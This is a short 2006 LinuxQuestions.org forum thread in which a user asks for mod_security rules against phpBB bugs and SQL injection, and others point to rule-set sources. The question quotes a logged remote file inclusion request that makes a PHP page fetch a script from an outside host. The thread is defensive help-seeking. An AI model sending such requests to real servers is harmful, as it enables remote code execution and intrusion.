LinuxQuestions.org - Mod-Security Rules

- Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)

- - Mod-Security Rules (https://www.linuxquestions.org/questions/linux-security-4/mod-security-rules-457830/)

stormrider_may

06-24-2006 07:27 AM

Mod-Security Rules

Hello,

Could someone tell me where can i find rules for mod-security that protects me against phpbb bugs, sql injection and those things:

Quote:

GET index.php?c=http://xpl.netmisphere2.com/tool.txt?& HTTP/1.0

I would appreciate some help.

Thanks.

TigerOC

06-25-2006 06:35 AM

Quote:

Originally Posted by stormrider_may

Hello,

Could someone tell me where can i find rules for mod-security that protects me against phpbb bugs, sql injection and those things:

I would appreciate some help.

Thanks.

Go to modsecurity.org and you will find the common rule sets (under Projects) that accommodate most of the common holes. You need to read the docs about incorporating the rules in apache. I copied and pasted most of the rules into mine with little difficulty.

unSpawn

06-27-2006 08:07 AM

From the LQ FAQ: Security references, post #6 "Securing networked services", additionally see:
mod_security rulesets: http://www.gotroot.com/mod_security+rules
mod_security rule generator: http://leavesrustle.com/tools/modsecurity/

All times are GMT -5. The time now is 07:46 AM.